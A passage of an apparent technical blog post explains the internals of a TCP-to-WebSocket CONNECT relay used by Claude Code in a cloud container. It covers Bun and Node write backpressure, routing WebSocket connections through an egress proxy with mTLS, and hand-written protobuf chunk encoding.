&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;http&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;//localhost:8080     → ws://localhost:8080/v1/code/upstreamproxy/ws&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;replace&lt;/code&gt; catches both &lt;code&gt;http→ws&lt;/code&gt; and &lt;code&gt;https→wss&lt;/code&gt; because &lt;code&gt;String.prototype.replace&lt;/code&gt; with a string pattern substitutes only the first occurrence, which is the scheme at the start of the URL; the trailing &lt;code&gt;s&lt;/code&gt; of &lt;code&gt;https&lt;/code&gt; is left in place, yielding &lt;code&gt;wss&lt;/code&gt;. The server-side endpoint path mirrors the REST API namespace.&lt;/p&gt;
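&lt;p&gt;The first-occurrence behavior is easy to check directly (a sketch of the same transform, not the relay's exact code):&lt;/p&gt;

```javascript
// String.prototype.replace with a string pattern substitutes only the
// first occurrence, i.e. the scheme at the start of the URL.
function toWsUrl(baseUrl) {
  return baseUrl.replace("http", "ws") + "/v1/code/upstreamproxy/ws";
}
```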

&lt;h3&gt;
  
  
  The 502 Boundary
&lt;/h3&gt;

&lt;p&gt;The relay only sends &lt;code&gt;HTTP/1.1 502 Bad Gateway&lt;/code&gt; if the tunnel hasn't been established yet. Once the first server response has been forwarded (the &lt;code&gt;200 Connection Established&lt;/code&gt;), the connection is carrying TLS. Writing a plaintext HTTP error into a TLS stream would corrupt the client's connection. After establishment, the relay just closes the socket silently.&lt;/p&gt;

&lt;p&gt;A &lt;code&gt;closed&lt;/code&gt; flag prevents double-end: the WebSocket &lt;code&gt;onerror&lt;/code&gt; event is always followed by &lt;code&gt;onclose&lt;/code&gt;, and without a guard, both handlers would call &lt;code&gt;socket.end()&lt;/code&gt; on an already-ended socket. The first handler to fire sets &lt;code&gt;closed = true&lt;/code&gt;; the second sees the flag and returns immediately.&lt;/p&gt;
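&lt;p&gt;The guard reduces to a closure over one boolean. A sketch (the &lt;code&gt;makeCloser&lt;/code&gt; name is an assumption):&lt;/p&gt;

```javascript
// onerror is always followed by onclose, but socket.end() must run once.
function makeCloser(socket) {
  let closed = false;
  return function endOnce() {
    if (closed) return;   // second caller sees the flag and bails
    closed = true;
    socket.end();
  };
}
```

&lt;p&gt;Both the &lt;code&gt;onerror&lt;/code&gt; and &lt;code&gt;onclose&lt;/code&gt; handlers call the same &lt;code&gt;endOnce&lt;/code&gt;; whichever fires first wins.&lt;/p&gt;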




&lt;h2&gt;
  
  
  Two Runtimes, Two TCP Servers
&lt;/h2&gt;

&lt;p&gt;Claude Code supports both Bun and Node as runtimes. The relay needs a TCP server, and the two runtimes have fundamentally different TCP APIs. Rather than abstracting behind a compatibility layer, the relay implements two complete server paths and dispatches at startup:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;startRelay&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;authHeader&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;wsAuthHeader&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="k"&gt;typeof&lt;/span&gt; &lt;span class="nx"&gt;Bun&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="kc"&gt;undefined&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;startBunRelay&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;authHeader&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;wsAuthHeader&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;startNodeRelay&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;authHeader&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;wsAuthHeader&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Bun Path
&lt;/h3&gt;

&lt;p&gt;Bun provides &lt;code&gt;Bun.listen()&lt;/code&gt;, a callback-based TCP server where each connection gets an &lt;code&gt;open&lt;/code&gt;, &lt;code&gt;data&lt;/code&gt;, &lt;code&gt;drain&lt;/code&gt;, &lt;code&gt;close&lt;/code&gt;, and &lt;code&gt;error&lt;/code&gt; handler. Connection state is stored directly on the socket's &lt;code&gt;data&lt;/code&gt; property — no external map needed.&lt;/p&gt;

&lt;p&gt;The critical difference is &lt;strong&gt;write backpressure&lt;/strong&gt;. When you call &lt;code&gt;sock.write(bytes)&lt;/code&gt; in Bun, it returns the number of bytes actually written to the kernel buffer. If the buffer is full, it returns less than the full length. The remaining bytes are &lt;strong&gt;silently dropped&lt;/strong&gt; — Bun does not auto-buffer them.&lt;/p&gt;

&lt;p&gt;The relay handles this with an explicit write queue per connection:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;bunWrite&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="nx"&gt;bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;toBytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;If&lt;/span&gt; &lt;span class="nx"&gt;there&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;s already a backlog, just queue
    if state.writeBuf is not empty:
        state.writeBuf.push(bytes)
        return

    # Try writing directly
    n = socket.write(bytes)
    if n &amp;lt; bytes.length:
        # Partial write — queue the remainder
        state.writeBuf.push(bytes[n:])

# When the kernel buffer drains, Bun calls drain()
function drain(socket):
    while state.writeBuf is not empty:
        chunk = state.writeBuf[0]
        n = socket.write(chunk)
        if n &amp;lt; chunk.length:
            state.writeBuf[0] = chunk[n:]
            return  # still full, wait for next drain
        state.writeBuf.shift()
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without this, a fast upstream server sending data faster than the client can consume would silently lose bytes mid-TLS-stream — corrupting the connection with no error message.&lt;/p&gt;
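&lt;p&gt;The queue-and-drain logic can be exercised against a fake socket that accepts only a few bytes per call. This sketch assumes Bun's contract as described above (&lt;code&gt;write&lt;/code&gt; returns the byte count accepted); strings stand in for byte buffers:&lt;/p&gt;

```javascript
// Write queue for a partial-write socket: write() returns how much the
// kernel accepted, and anything beyond that is ours to keep and retry.
function makeWriter(socket) {
  const writeBuf = [];
  function write(data) {
    if (writeBuf.length > 0) { writeBuf.push(data); return; } // backlog first
    const n = socket.write(data);
    if (n !== data.length) writeBuf.push(data.slice(n));      // queue remainder
  }
  function drain() {
    while (writeBuf.length > 0) {
      const chunk = writeBuf[0];
      const n = socket.write(chunk);
      if (n !== chunk.length) { writeBuf[0] = chunk.slice(n); return; }
      writeBuf.shift();
    }
  }
  return { write, drain };
}
```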

&lt;h3&gt;
  
  
  The Node Path
&lt;/h3&gt;

&lt;p&gt;Node's &lt;code&gt;net.createServer()&lt;/code&gt; takes a connection callback. Each connection is a &lt;code&gt;Socket&lt;/code&gt; object with event emitters. Connection state is stored in a &lt;code&gt;WeakMap&lt;/code&gt; keyed by the socket — when the socket is garbage-collected, the state goes with it.&lt;/p&gt;

&lt;p&gt;Node's &lt;code&gt;sock.write()&lt;/code&gt; is fundamentally different from Bun's: it &lt;strong&gt;always buffers&lt;/strong&gt;. If the kernel buffer is full, &lt;code&gt;write()&lt;/code&gt; returns &lt;code&gt;false&lt;/code&gt; to signal backpressure, but the bytes are already queued internally. They will be flushed when the buffer drains. No explicit write queue is needed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Node&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="nx"&gt;auto&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;buffers&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;never&lt;/span&gt; &lt;span class="nx"&gt;drops&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt;
&lt;span class="nx"&gt;adapter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;write&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;toBuffer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
    &lt;span class="na"&gt;end&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is why the relay has two implementations rather than one: the core CONNECT parsing and WebSocket tunneling logic is shared (via &lt;code&gt;handleData&lt;/code&gt; and &lt;code&gt;openTunnel&lt;/code&gt;), but the TCP I/O layer has different correctness requirements. A single abstraction would either waste memory in Node (unnecessary write queue) or lose bytes in Bun (missing write queue).&lt;/p&gt;

&lt;h3&gt;
  
  
  The Egress Proxy Problem
&lt;/h3&gt;

&lt;p&gt;The CCR container sits behind an egress gateway — direct outbound connections are blocked. This creates a chicken-and-egg problem: the relay needs to open a WebSocket to the cloud gateway, but the WebSocket connection itself must go through the egress proxy.&lt;/p&gt;

&lt;p&gt;Node's &lt;code&gt;undici.WebSocket&lt;/code&gt; (the &lt;code&gt;globalThis.WebSocket&lt;/code&gt; in Node) does &lt;strong&gt;not&lt;/strong&gt; consult the global dispatcher for upgrade requests. So even though the process has &lt;code&gt;HTTPS_PROXY&lt;/code&gt; configured, the WebSocket wouldn't use it. The relay works around this by using the &lt;code&gt;ws&lt;/code&gt; package with an explicit proxy agent:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Node&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;preload&lt;/span&gt; &lt;span class="nx"&gt;ws&lt;/span&gt; &lt;span class="kr"&gt;package&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;pass&lt;/span&gt; &lt;span class="nx"&gt;explicit&lt;/span&gt; &lt;span class="nx"&gt;agent&lt;/span&gt;
&lt;span class="nx"&gt;WS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ws&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;ws&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;WS&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Content-Type&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;application/proto&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;Authorization&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;bearerToken&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="na"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;getWebSocketProxyAgent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;  &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;CONNECT&lt;/span&gt; &lt;span class="nx"&gt;through&lt;/span&gt; &lt;span class="nx"&gt;egress&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt;
    &lt;span class="na"&gt;tls&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;getWebSocketTLSOptions&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;          &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;mTLS&lt;/span&gt; &lt;span class="nx"&gt;certs&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;configured&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;ws&lt;/code&gt; package is preloaded during &lt;code&gt;startNodeRelay()&lt;/code&gt; — before any connection arrives — so that &lt;code&gt;openTunnel()&lt;/code&gt; stays synchronous. If the &lt;code&gt;import('ws')&lt;/code&gt; happened inside &lt;code&gt;openTunnel&lt;/code&gt;, the CONNECT state machine would race: a second data event could fire while the import was awaiting, and the state would be inconsistent.&lt;/p&gt;

&lt;p&gt;Bun's native &lt;code&gt;WebSocket&lt;/code&gt; accepts a &lt;code&gt;proxy&lt;/code&gt; URL directly as a constructor option — no agent needed. It also accepts a &lt;code&gt;tls&lt;/code&gt; option for custom certificates. The Bun path is simpler because the runtime was designed for this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Bun&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="nx"&gt;and&lt;/span&gt; &lt;span class="nx"&gt;TLS&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="kd"&gt;constructor&lt;/span&gt; &lt;span class="nx"&gt;options&lt;/span&gt;
&lt;span class="nx"&gt;ws&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;WebSocket&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Content-Type&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;application/proto&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;Authorization&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;bearerToken&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="na"&gt;proxy&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;getWebSocketProxyUrl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;   &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;an&lt;/span&gt; &lt;span class="nx"&gt;agent&lt;/span&gt;
    &lt;span class="na"&gt;tls&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;getWebSocketTLSOptions&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Both paths honor mTLS configuration (client certificates set via &lt;code&gt;CLAUDE_CODE_CLIENT_CERT&lt;/code&gt; and &lt;code&gt;CLAUDE_CODE_CLIENT_KEY&lt;/code&gt;), so the relay works in enterprise environments that require mutual TLS for all outbound connections.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Protobuf Wire Format
&lt;/h2&gt;

&lt;p&gt;Bytes between the relay and gateway are wrapped in protobuf messages:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight protobuf"&gt;&lt;code&gt;&lt;span class="kd"&gt;message&lt;/span&gt; &lt;span class="nc"&gt;UpstreamProxyChunk&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;bytes&lt;/span&gt; &lt;span class="na"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
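&lt;p&gt;Decoding is symmetric. A sketch of what the &lt;code&gt;decodeChunk&lt;/code&gt; seen earlier in &lt;code&gt;onmessage&lt;/code&gt; has to do (written with arithmetic instead of bit operations for clarity; an assumption, not the relay's code):&lt;/p&gt;

```javascript
// Minimal decoder for the one-field UpstreamProxyChunk message:
// expect tag 0x0a, varint-decode the length, slice out the data bytes.
function decodeChunk(bytes) {
  if (bytes.length === 0) return null;
  if (bytes[0] !== 0x0a) return null;   // tag: field 1, wire type 2
  let len = 0;
  let factor = 1;
  let i = 1;
  while (true) {
    const b = bytes[i];
    i += 1;
    len += (b % 128) * factor;          // low 7 bits carry the value
    if (b >= 0x80) { factor *= 128; continue; }  // high bit set: more bytes
    break;
  }
  return bytes.slice(i, i + len);
}
```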



&lt;p&gt;The encoding is hand-written — no protobuf library, no code generation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;encodeChunk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Protobuf&lt;/span&gt; &lt;span class="nx"&gt;field&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;wire&lt;/span&gt; &lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;delimited&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nx"&gt;tag&lt;/span&gt; &lt;span class="nx"&gt;byte&lt;/span&gt; &lt;span class="mh"&gt;0x0a&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Tag&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;field_number&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nx"&gt;wire_type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mh"&gt;0x0a&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Varint&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;encode&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;
    &lt;span class="nx"&gt;varint&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
    &lt;span class="nx"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="nx"&gt;n&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mh"&gt;0x7f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nx"&gt;varint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;push&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;n&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0x7f&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="mh"&gt;0x80&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nx"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;n&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;7&lt;/span&gt;
    &lt;span class="nx"&gt;varint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Assemble&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mh"&gt;0x0a&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;varint&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="nx"&gt;out&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;varint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mh"&gt;0x0a&lt;/span&gt;
    &lt;span class="nx"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;..]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;varint&lt;/span&gt;
    &lt;span class="nx"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;varint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;..]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;out&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Decoding is the reverse: verify the 0x0a tag, read the varint length, extract the payload. A shift exceeding 28 bits is rejected (guards against malformed varints). Zero-length chunks are valid (keepalive semantics).&lt;/p&gt;
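&lt;p&gt;A runnable sketch of the round-trip, in Python for brevity (the shipped encoder is JavaScript; the names here are illustrative, not the actual implementation):&lt;/p&gt;

```python
def encode_chunk(data: bytes) -> bytes:
    """Wrap payload bytes as protobuf field 1, wire type 2 (length-delimited)."""
    out = bytearray([0x0A])           # tag = (1 << 3) | 2 = 0x0a
    n = len(data)
    while n > 0x7F:                   # varint-encode the length, 7 bits at a time
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    out.extend(data)
    return bytes(out)


def decode_chunk(frame: bytes) -> bytes:
    """Reverse of encode_chunk: verify the tag, read the varint length, slice the payload."""
    if not frame or frame[0] != 0x0A:
        raise ValueError("expected tag byte 0x0a")
    length, shift, i = 0, 0, 1
    while True:
        if shift > 28:                # reject malformed varints
            raise ValueError("varint too long")
        byte = frame[i]
        length |= (byte & 0x7F) << shift
        i += 1
        if byte < 0x80:
            break
        shift += 7
    return frame[i:i + length]
```

Note that `encode_chunk(b"")` yields the two-byte frame `0x0a 0x00`, consistent with zero-length chunks being valid keepalives.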

